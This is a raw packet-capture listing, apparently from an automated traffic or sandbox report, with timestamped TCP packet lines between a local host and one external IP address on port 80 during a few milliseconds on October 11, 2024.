                                                                                                                                                              Oct 11, 2024 22:32:39.832250118 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832252979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832268953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832290888 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832468033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832479000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832489967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832499981 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832510948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832520008 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832520962 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832531929 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832535028 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832542896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832561970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832566977 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832577944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832582951 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832588911 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832603931 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832628012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832688093 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832779884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832791090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832819939 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832827091 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832833052 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832844019 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832854986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832878113 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832879066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832891941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832899094 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832902908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.832926035 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.832948923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833592892 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833604097 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833615065 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833637953 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833638906 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833650112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833661079 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833663940 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833672047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833688021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833719969 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833730936 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833741903 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833751917 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833775043 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833797932 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833815098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833825111 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833834887 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833844900 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.833862066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.833884954 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857358932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857405901 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857417107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857429028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857490063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857501030 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857503891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857513905 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857534885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857536077 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857553005 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857562065 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857567072 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857578993 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857584000 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857590914 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857601881 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857613087 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857614040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857631922 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857640028 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857651949 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857657909 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857664108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857676983 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857681036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857702971 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857724905 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857773066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857784986 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857796907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857806921 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857812881 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857820034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857825041 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857831955 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857842922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857844114 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857861996 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857887983 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857893944 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857906103 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857916117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857928038 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857937098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.857940912 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857950926 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.857975006 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.919636965 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919675112 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919687033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919698000 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919722080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.919729948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919744968 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919750929 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.919759989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919771910 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.919795036 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.919814110 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.920525074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.920569897 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.920810938 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.920824051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.920870066 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.920876026 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.920975924 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.920989037 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921024084 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921060085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921071053 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921081066 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921088934 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921092033 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921103001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921108007 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921130896 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921147108 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921204090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921215057 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921226025 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921237946 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921247959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921253920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921260118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921279907 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921288967 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921303034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921318054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921318054 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921327114 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921329021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921338081 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921345949 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921349049 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921360970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921361923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921371937 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.921385050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921385050 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.921459913 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.981978893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982013941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982024908 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982034922 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982044935 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982053995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982064962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982088089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982091904 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982104063 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982114077 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982124090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982134104 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982144117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982144117 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982153893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982163906 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982165098 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982182026 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982201099 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982234001 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982248068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982259989 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982270002 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982273102 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982280970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982281923 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982295990 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982299089 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982321024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982347965 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982394934 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982408047 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982418060 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982428074 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982430935 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982439995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982445955 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982453108 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982460976 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982491016 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982522964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982533932 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982557058 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982563972 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982574940 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982578993 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982587099 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982595921 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982599020 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982610941 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982611895 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982629061 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982650042 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982790947 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982815027 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982826948 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982836962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982846975 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982853889 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982858896 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982872009 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.982877970 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982896090 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.982917070 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983243942 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983268976 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983284950 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983294964 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983304024 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983306885 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983318090 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983325005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983329058 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983340025 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983340979 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983354092 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983364105 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983366013 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983381987 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983405113 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983406067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983406067 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983417034 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983431101 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983442068 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983443022 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983454943 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983457088 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983467102 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983479023 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983486891 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983486891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983500004 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983504057 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983513117 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983520985 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983525991 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983541012 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983549118 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983561039 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983563900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983563900 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983572960 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983597040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983597040 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983611107 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983623981 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983633995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983639956 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983639956 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983644962 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983676910 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983685970 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983697891 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983700037 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983710051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983720064 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983721018 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983737946 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983753920 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983844995 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983856916 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983867884 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983877897 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983889103 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.983891964 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983906984 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983922005 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.983968973 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984004021 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.984133959 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984155893 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984165907 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984172106 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.984188080 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.984201908 CEST4970780192.168.2.845.66.249.162
                                                                                                                                                              Oct 11, 2024 22:32:39.984307051 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984332085 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984344006 CEST804970745.66.249.162192.168.2.8
                                                                                                                                                              Oct 11, 2024 22:32:39.984354019 CEST804970745.66.249.162192.168.2.8
